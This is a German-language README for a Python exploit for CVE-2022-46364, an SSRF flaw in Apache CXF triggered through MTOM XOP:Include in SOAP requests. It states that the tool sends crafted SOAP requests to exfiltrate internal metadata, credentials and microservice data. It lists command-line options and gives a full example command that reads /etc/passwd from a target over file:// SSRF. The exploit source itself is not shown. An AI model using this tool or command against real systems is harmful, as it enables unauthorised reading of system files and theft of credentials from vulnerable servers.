
Python-Exploit für CVE-2022-46364 (Apache CXF SSRF über MTOM XOP:Include). Sendet manipulierte SOAP-Anfragen, um interne Metadaten, Anmeldeinformationen und Mikroservicedaten von anfälligen Endpunkten zu exfiltrieren.
Apache CXF SSRF über MTOM XOP:Include | CVSS 9.8 KRITISCH
Apache CXF < 3.5.5 / < 3.4.10 ermöglicht Server-Side Request Forgery über nicht validierte XOP:Include-href-Attribute in MTOM-kodierten SOAP-Anfragen.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target – Angreifbarer CXF-SOAP-Endpunkt (erforderlich)-s, --ssrf-url – Interne URL, die exfiltriert werden soll (erforderlich)-d, --domain – Zieldomäne (Standard: localhost)--plain-soap – Einfaches SOAP anstelle von MTOM verwenden# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com